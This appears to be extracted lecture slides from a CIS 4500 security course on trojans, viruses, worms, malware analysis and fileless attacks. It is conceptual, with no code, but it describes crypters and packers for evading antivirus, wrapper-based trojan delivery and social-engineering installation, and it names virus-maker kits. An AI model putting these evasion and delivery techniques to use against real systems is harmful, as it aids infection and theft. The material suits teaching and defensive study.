.

1

Trojans and Other Attacks

Chapter #9:

CIS 4500

Outline

n  Describe malware types and their purpose

n  Identify malware deployment methods

n  Describe the malware analysis process

n  Identify malware countermeasures

n  Describe DoS attacks and techniques

n  Identify DoS detection and countermeasure action

n  Describe session hijacking and sequence prediction

CIS 4500

The “Malware” Attacks

n  Malware is generally defined as software designed to harm

or secretly access a computer system without the owner’s

informed consent

n  CIS profession thinks of it as hostile, intrusive, annoying,

and definitely something to be avoided

n  Most malware is simply downloaded from the Internet with

or without the user’s knowledge

CIS 4500

The “Malware” Attacks

n  Software is considered to be malware based on the

perceived intent of the creator rather than any particular

features

n  Most people think of viruses, worms, and Trojans as a

means to spread destruction and as a huge inconvenience

to computing life – to an ethical hacker the Trojan might

actually look like a good means to pull off a successful

exploit or to retain access to a machine—it’s simply one of

many tools in the arsenal.

.

2

CIS 4500

Malware

n  There are a ton of “legitimate” applications, add-ons,

toolbars, and the like that aren’t intended to be malware,

but they may as well be

n  Is “stealing” data for advertising purposes malware in

nature

n  Or how about AV programs flagging applications as virus

and/or malware

CIS 4500

How to Get Malware

n  Legitimate sites get compromised, leading to infections on

visiting systems

n  Drive-by downloading infects the system, usually via some

weird Java vulnerability delivered through an ad stream

n  Peer-to-peer applications or web application “features” are

often hijacked to distribute malware

n  An IRC channel is always a great way to distribute malware

CIS 4500

How to Get Malware

n  The absolute easiest way you can get a target to install

your malware is to just ask them to do it for you

n  Send malware (usually a Trojan) via e-mail, file sharing, or a

browser and, more often than not, they’ll open it and happily

install whatever you want

CIS 4500

How to Pretend to Be Legitimate

n  Wrappers

n  Crypters and packers

.

3

CIS 4500

Wrappers

n  Wrappers are programs that allow you to bind an

executable of your choice (Trojan) to an innocent file your

target won’t mind opening

n  Your target opens the application

n  Meanwhile, your backdoor is installing and sits there

waiting for your use later

n  They have their own signatures and can definitely show up

on AV scans

CIS 4500

Crypters

n  Crypters are software tools that use a combination of

encryption and code manipulation to render malware

undetectable to AV and other security monitoring products

(in Internet lingo, it’s referred to as fud, for “fully

undetectable”).

CIS 4500

Packers

n  Packers use compression to pack the malware executable

into a smaller size

n  It reduces the file size, it also serves to make the malware

harder to detect for some antivirus engines

n  Both crypters and packers work much like a ZIP file, except

that the extraction occurs in memory and not on the disk

CIS 4500

Trojans

n  Trojan is software that appears to perform a desirable

function for the user prior to running or installing it but

instead performs a function, usually without the user’s

knowledge, that steals information or otherwise harms the

system (or data)

n  The word Trojan really means a method to gain, and

maintain, access on a target machine

.

4

CIS 4500

Trojan Ports

CIS 4500

Viruses

n  A virus is a self-replicating program that reproduces its

code by attaching copies into other executable codes

n  viruses create copies of themselves in other programs

n  activate on some sort of trigger event (such as a specific user

task, a particular time, or an event of some sort)

n  They usually get installed on a system via file attachments,

user clicks on embedded e-mails, or the installation of

pirated software

CIS 4500

Viruses

n  Ransomeware

n  this malware locks you out of your own system resources and

demands an online payment of some sort in order to release

them back to you

n  usually the payment is smaller than the cost it would take to

remove the malware and recover anything lost. Ransomeware

is ubiquitous and unfortunately you’ll probably see it

somewhere, sometime in your travels

n  Cryptorbit, CryptoLocker, CryptoDefense, and police-themed

CIS 4500

Viruses

n  Boot sector virus

n  also known as a system virus

n  moves the boot sector to another location on the hard drive,

forcing the virus code to be executed first

n  these viruses are almost impossible to get rid of once you get

infected

n  you can re-create the boot record — but easy

.

5

CIS 4500

Viruses

n  Shell virus

n  working just like the boot sector virus, this virus type wraps

itself around an application’s code, inserting its own code

before the application’s

n  every time the application is run, the virus code is run first

n  Cluster virus

n  this virus type modifies directory table entries so that user or

system processes are pointed to the virus code itself

n  single copy of the virus “infects” everything

CIS 4500

Viruses

n  Multipartite virus

n  this generally refers to a virus with multiple infection vectors

n  attempts to infect both files and the boot sector at the same

time

n  multipartite can be combined with other attributes:

polymorphic, retroviral, boot sector, and generally a pretty

wild bit of code

CIS 4500

Viruses

n  Macro virus

n  probably one of the most common malware types you’ll see in

today’s world

n  this is usually written with Visual Basic for Applications (VBA).

n  this virus type infects template files created by Microsoft

Office, normally Word and Excel

CIS 4500

Viruses

n  Polymorphic code virus

n  this virus mutates its code using a built-in polymorphic engine

n  this type of virus is difficult to find and remove because its

signature constantly changes

n  no part of the virus stays the same from infection to infection

n  Encryption virus

n  this type of virus uses encryption to hide the code from

antivirus scanners

.

6

CIS 4500

Viruses

n  Metamorphic virus

n  rewrites itself every time it infects a new file

n  Stealth virus

n  also known as a “tunneling virus”

n  attempts to evade antivirus (AV) applications by intercepting

the AV’s requests to the operating system (OS) and returning

them to itself instead of the OS

n  the virus then alters the requests and sends them back to AV

as uninfected, making the virus now appear “clean”

CIS 4500

Viruses

n  Cavity virus C

n  cavity viruses overwrite portions of host files so as not to

increase the actual size of the file

n  this is done using the null content sections of the file and

leaves the file’s actual functionality intact

n  Sparse infector virus

n  they only infect occasionally – e.g. maybe the virus only fires

every tenth time a specific application is run

CIS 4500

Viruses

n  File extension virus

n  they change the file extensions of files to take advantage of

most people having file extension view turned off

n  e.g. readme.txt.vbs might appear as readme.txt with

extensions turned off

CIS 4500

Virus -Makers

n  Sonic Bat

n  PoisonVirus Maker

n  Sam’s Virus Generator

n  JPS Virus Maker

.

7

CIS 4500

Worms

n  A worm is a self-replicating malware computer program

that uses a computer network to send copies of itself to

other systems without human intervention

n  Usually it doesn’t alter files, but it resides in active memory

and duplicates itself, eating up resources and wreaking

havoc along the way

n  The most common use for a worm in the hacking world is

the creation of botnets

CIS 4500

Worms

n  Code Red

n  named after the soft drink the eEye Digital guys were drinking

when they discovered it

n  exploited indexing software on IIS servers in 2001

n  used a buffer overflow and defaced servers

n  Darlloz

n  worm for “the Internet of Things,”; it is a Linux-based worm that

targets running ARM, MIPS, and PowerPC architectures— which

are usually routers, set-top boxes, and security cameras

CIS 4500

Worms

n  Slammer

n  also known as SQL Slammer

n  a denial-of-service worm attacking buffer overflow weaknesses

in Microsoft SQL services. Also called Sapphire, SQL_HEL, and

n  it spread quickly using UDP

n  its small size (the entire worm could fit inside a single packet)

allowed it to bypass many sensors

CIS 4500

Worms

n  Nimda

n  worm’s name comes from the word admin spelled backward

n  Nimda was a successful file infection virus that modified and

touched nearly all web content on a machine

n  it spread so quickly it became the most widespread worm in

history within about 22 minutes of its first sighting

n  Nimda spread through e-mail, open network shares, and

websites, and it also took advantage of backdoors left on

machines infected by the Code Red worm

.

8

CIS 4500

Worms

n  Bug Bear

n  propagating over open network shares and e-mail, Bug Bear

terminated AV applications and set up a backdoor for later use.

n  it also contained keylogging capabilities

CIS 4500

Worms

n  Pretty Park

n  spread via e-mail (attempting a send every 30 minutes) and

took advantage of IRC to propagate stolen passwords and the

like

n  running the worm executable often displayed the 3D Pipe

screensaver on Windows machines

CIS 4500

Malware Analysis

n  The first step: have a good test bed

n  using a virtual machine with the NIC in host-only mode and no

open shares is a good start

n  Analyze the malware on that isolated VM while it’s in a

static state

n  tools such as binText and UPX can help in examining the

binary itself as well as the compression and packaging

technique. Next, fire up the malware and check out the

processes in use (with Process Monitor and Process Explorer,

for example). Review network traffic using NetResident,

TCPview, or maybe even Wireshark. Lastly, check to see what

files are added, changed, or deleted, what processes continue

to spawn, and any changes to the registry. Tools that can help

you with malware analysis include, but are not limited to, IDA

Pro (www.hex-rays.com), VirusTotal (www.virustotal.com),

Anubis (Anubis .iseclab.org), and Threat Analyzer

(www.threattracksecurity.com).

CIS 4500

Non-Malware (or Fileless) Attack

n  A user visits a website using a browser, perhaps driven there from a cleverly

disguised spam message

n  On this page, Flash is loaded — Flash is a common attack vector due to its seemingly

never-ending set of vulnerabilities

n  Flash invokes PowerShell, an OS tool that exists on every Windows machine, and

feeds it instructions through the command line — all operating in memory

n  PowerShell connects to a stealth command and control server, where it downloads a

malicious PowerShell script that finds sensitive data and sends it to the attacker

n  This attack never downloads any malware

.

9

CIS 4500

Tools for Your Lab

n  VirtualBox (.org) – can also convert between formats

(.vmdk, .vdi .vhd)

n  DOSBox (.com)

n  VMWare player (VMWare.com)

n  Free Windows VM (MS Developer)

n  Metasploitable (Rapid7.com)

n  Kali (.org)

Stay Alert!

There is no 100 percent secure system,

and there is nothing that is foolproof!